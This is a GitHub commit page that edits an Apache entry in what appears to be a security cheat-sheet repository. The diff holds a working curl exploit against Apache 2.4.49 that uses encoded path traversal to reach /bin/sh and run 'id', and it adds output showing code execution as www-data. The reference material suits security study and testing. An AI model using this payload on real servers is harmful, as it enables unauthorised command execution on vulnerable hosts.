Skip to content

Commit

Permalink
add output command
Browse files Browse the repository at this point in the history
  • Loading branch information
xanhacks committed Oct 3, 2023
1 parent 9b0be66 commit 99945a9
Showing 1 changed file with 3 additions and 1 deletion.
4 changes: 3 additions & 1 deletion content/en/docs/framework/apache.md
Original file line number Diff line number Diff line change
Expand Up @@ -52,7 +52,9 @@ RewriteRule "^/here/(.*)" "http://example.com:8080/elsewhere?$1";
- Version: `2.4.49`

```bash
$ curl 'http://localhost/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'echo Content-Type: text/plain; echo; id'
$ curl 'http://localhost/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh' \
-d 'echo Content-Type: text/plain; echo; id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

## Resources
Expand Down

0 comments on commit 99945a9

Please sign in to comment.